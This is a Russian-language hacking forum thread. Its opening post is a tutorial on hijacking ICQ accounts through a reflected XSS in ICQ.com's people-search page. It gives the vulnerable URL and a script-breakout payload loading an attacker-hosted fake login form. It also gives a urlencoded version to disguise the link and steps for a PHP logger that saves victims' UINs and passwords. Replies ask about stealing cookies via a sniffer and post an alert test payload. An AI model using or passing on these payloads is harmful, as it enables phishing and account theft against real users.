![]() |
Заходим в Icq через Xss
Заходим в Icq через Xss В этой статье я расскажу, как можно использовать уязвимость XSS на сайте ICQ.com. Всем известно, что через фейк можно угнать icq, но далеко не все станут заходить по ссылке vasya.com/fake.php. Возникает вопрос, можно ли сделать так, чтобы фейк был на ICQ.com? Ответ простой - да, и не сложно. ...Немного теории... Нам понадобится: 1. Хост с поддержкой PHP (платный или бесплатный) 2. Уязвимость (XSS) 3. Два скрипта : 1. ФейкУязвимость ICQ.com - файл icq.com/people/ уязвимое поле gender, вот урл: http://icq.com/people/?people_search=1&searched=1&gender=[xss] Фейк получился у меня очень большой и не поместился в сообщение, поэтому скачать =) Сохранялка пароля (login.php) очень простая PHP код:
...От теории к практике... Заливаем файл login.php на хост с поддержкой PHP. Приётся немного подкорректировать фейк (script.js). Измените содержание переменной $fake (http://site/karma/login.php) на урл до login.php. Ну и собственно заливаем его туда же. Теперь нам надо только составить урл уязвимости. Открываем http://icq.com/people/?people_search=1&searched=1&gender=[xss], но вместо [xss] напишем к примеру <xss_test>, теперь видим, что баг находится внутри скрипта: Код:
<script type="text/javascript" language="Javascript"> Код:
<script type="text/javascript" language="Javascript"> http://icq.com/people/?people_search=1&searched=1&gender=1;</script><script src="путь_до_фейка"></script><script>// Не очень красиво, согласитесь? Есть множество програм/тулз, которые маскируют ссылку, я выбрал способ - с помощью urlencode (в PHP). Кто не знает, где найти маскировщик, юзайте мой (вписываете этот ява скрипт код и Url будет маскировкой). У нас получится урл типо этого: http://icq.com/people/?people_search=1&searched=1&gender=%31%3b%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%7 0%74%20%73%72%63%3d%22%ef%f3%f2%fc%5f%e4%ee%5f%f4% e5%e9%ea%e0%22%3e%3c%2f%73%63%72%69%70%74%3e%3c%73 %63%72%69%70%74%3e%2f%2f Не супер секретная ссылка, но это, всё что можно сделать =) Ах да, и ещё к сожалению, она не будет работать в осле, не знаю почему.. Теперь можете попробывать ввеси уин и пароль, и когда нажмёте submit, ваши данные сохранятся в файл, указанный в login.php (по умолчанию - icq.txt), а вы, как ни в чём не бывало, перейдёте на http://icq.com. Вы так же можете очищать этот файл, зайдя на login.php?delete=ok. P.S. Thx 2 inv за идею =) P.P.S. Нет, я не увлёкся взломом ICQ, я просто решил поведать новичкам о том, как сделать фейк ICQ.com на самом же ICQ.com. |
возможно фейк будет дописан
просьба не кидаться колкими словечками в Nomer1=) |
NoScript отфильтровал нежелательную XSS отаку =)
Спасиб, + |
Что-то не работает у меня.
Должно появляться меню ввода что ли? А куки можно стырить? =) |
Цитата:
|
ну это уже разжовано, а хсс можно было взять и в статье уязвимостей, так что зря как статью, пихнул бы сразу в пассивные хсс
|
ну на данный момент актуально, но ведь никто не знает сколько проживёт Xss =)
|
Цитата:
по идею тебе должно прийти коокие файл на сниффер. Кстати искомый алерт ни в опере ни в осле, что означает и не в фиреворксе не работает , вызывая в осле лишь ошибку =\ -) Кстати Номерьчег, а ты сам тестил?) и гиде файл-фейк? -) |
%31%3b%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%7 0%74%20%73%72%63%3d%22%ef%f3%f2%fc%5f%e4%ee%5f%f4% e5%e9%ea%e0%22%3e%3c%2f%73%63%72%69%70%74%3e%3c%73 %63%72%69%70%74%3e%2f%2f
Sn@k3 код страницы посмотри потом поймешь над кем надо смеяться=)(я тоже сначала не вкурил) |
Цитата:
http://icq.com/people/?people_search=1&searched=1&gender=1;</script><script>alert("XSS")</script> |
| Время: 22:07 |